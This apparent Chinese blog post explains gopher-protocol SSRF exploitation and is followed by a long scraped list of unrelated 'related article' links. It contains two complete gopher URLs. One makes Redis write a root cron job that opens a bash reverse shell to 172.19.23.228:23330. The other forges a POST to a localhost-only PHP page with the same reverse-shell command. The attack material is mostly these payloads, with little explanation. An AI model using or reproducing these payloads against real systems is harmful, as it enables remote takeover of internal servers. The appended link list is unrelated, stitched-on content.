gopher对mysql的利用_gopher协议的攻击利用
攻击内网redis
攻击redis常见exp为:
对应的gopher协议为:
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >&/dev/tcp/172.19.23.228/23330>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
攻击FastCGI 略
攻击内网Vulnerability Web
Gopher 可以模仿 POST 请求,故探测内网的时候不仅可以利用 GET 形式的 PoC(经典的 Struts2),还可以使用 POST 形式的 PoC。
一个只能 127.0.0.1 访问的 exp.php,内容为:
利用方式:
构造gopher协议的url:
gopher://127.0.0.1:80/_POST /exp.php HTTP/1.1%0d%0aHost:127.0.0.1%0d%0aUser-Agent: curl/7.43.0%0d%0aAccept:*/*%0d%0aContent-Length:49%0d%0aContent-Type: application/x-www-form-urlencoded%0d%0a%0d%0ae=bash -i >%2526/dev/tcp/172.19.23.228/23330>%25261null
gopher对mysql的利用_gopher协议的攻击利用相关推荐
- ubuntu怎么测tcp协议的服务器,Ubuntu利用TCP协议来获取server时间(示例代码)
Linux利用TCP协议来获取server时间 这里使用Unix网络编程里面的一个小程序,该client建立一个到server的TCP连接,然后读取由server以直观可读格式简单地送回的当前时间和日 ...
- java开发http协议接口_java开发接口利用http协议传输数据
java开发接口利用http协议传输数据java 这个接口主要用来登陆,java服务器提供一个接口,移动设备客户端(android和ios)能经过这个接口把用户名和密码之类的东东传过来到服务器验证,而 ...
- 利用SSL协议配置web服务器,基于windows2008平台配置实现利用SSL协议的安全IISWeb服务器汇总.doc...
PAGE \* MERGEFORMAT - 24 - PAGE \* MERGEFORMAT - 1 - 石河子大学信息科学与技术学院 课程设计报告2014-2015学年第一学期 题目名称:基于win ...
- java socket5源码_Java利用TCP协议实现客户端与服务器通信【附通信源码】
进行TCP协议网络程序的编写,关键在于ServerSocket套接字的熟练使用,TCP通信中所有的信息传输都是依托ServerSocket类的输入输出流进行的. TCP协议概念 先来了解一下TCP协议 ...
- 手机控制的esp8266利用mqtt协议接入百度云智能插座
手机控制的esp8266利用mqtt协议接入百度云智能插座 19年的春节,相信大家和我一样都待在家里,利用在家的时间现学现卖,制作了一款手机控制的智能插座,网上资料很多,我在查询资料中发现,esp82 ...
- 内网环路怎么解决_利用生成树协议巧妙解决局域网二层环路
[IT168 技术]本文主要介绍局域网交换技术,也称为层2交换技术,内容主要包括层2交换的工作原理.网络环路.如何利用Spanning-Tree Protocol 来解决网络环路.在介绍交换技术之前不 ...
- 利用MQTT协议与阿里云数据交互的python程序
利用MQTT协议与阿里云数据交互的python程序 设计目的 功能要求和关键问题 环境配置问题 本地程序如何连接云上设备 云上的数据交互问题 界面设计问题 阿里云相关操作 本地程序 设计目的 设计开发 ...
- 如何利用TFTP协议发动DDoS放大攻击
一个来自爱丁堡龙比亚大学的安全研究小组制定出一项新的DDoS放大技术方案,且主要依靠TFTP协议实现. 来 自爱丁堡龙比亚大学的一个安全专家小组(成员分别为Boris Sieklik.Richard ...
- Windows 和Linux利用tftp协议传送文件
Windows 和Ubuntu利用tftp协议传送文件 这几天公司需要将一个文件从Windows7传到装在虚拟机中的Linux系统中,由于Linux系统只开了tftp协议的69端口,只能通过tftp协 ...
- Akamai检测到超过400起利用DNSSEC协议的反射DDoS攻击
Akamai是一家大型互联网CDN服务提供商,然而根据其最新的DDoS趋势报告,发现利用DNSSEC协议的这类攻击已经更加猖獗.DNSSEC是"域名系统安全扩展"的简称,作为DNS ...
最新文章
- 为什么人们默认 x86 代表 32 位处理器
- mysql数据库子查询的使用_MySQL数据库使用子查询方式更新数据优化及思考
- 用matlab抽样定理验证,MATLAB抽样定理验证.docx
- Gale-Shapley算法
- 形式验证进阶 chipdriver_【饥荒进阶】烹饪基础:全食材系数详解-五耀整理
- 基于Python3-Pygame的植物大战僵尸小游戏
- 记录一次配置unix网络编程环境的过程和遇到的问题
- SpringBoot整合MyBatis后台分页前端BootstrapTable添加删除查看编辑搜索数据(二)
- 读书笔记《大数据时代》
- AI智能语音识别计算器
- 中国有哪些python比赛_有哪些大学生值得参与的竞赛?
- 要不要升级到iOS16?iOS16有什么缺点?
- 中文版Geneve02
- Could not autowire. No beans of ‘PaymentService‘ type found.Inspection info:Checks autowiring proble
- Ubuntu18.04 Sublime Text3
- 实用新型专利和发明专利有什么区别?
- CC2541延时函数
- Ogre shader中定义 param_named_auto custom, 材质中纹理操作
- 整数规划之分枝定界法
- Java基础学习之减肥计划
热门文章
- 详解手机注册验证码操作思路与流程
- 12.分布式定时任务(xxl-job)
- MOOC·嵩天老师团队·北京理工大学:《Python语言程序设计》自学笔记
- 安装杀毒软件是保障计算机安全,电脑安全都需要哪些杀毒软件
- vtuber面部捕捉工具_NOKOV(度量)动作捕捉携专业虚拟直播解决方案亮相世界VR产业大会...
- 数字信号传输理论 Nyquist准则
- 今日股市板块利好早知道,全球科技巨头聚齐联手保护云数据
- ubuntu16.04 将火狐浏览器语言设置成中文
- 重头戏!ZeroMQ的发布-订阅模式详解:ZMQ_PUB、ZMQ_SUB
- 飞鱼星测试软件,飞鱼星VE984GW+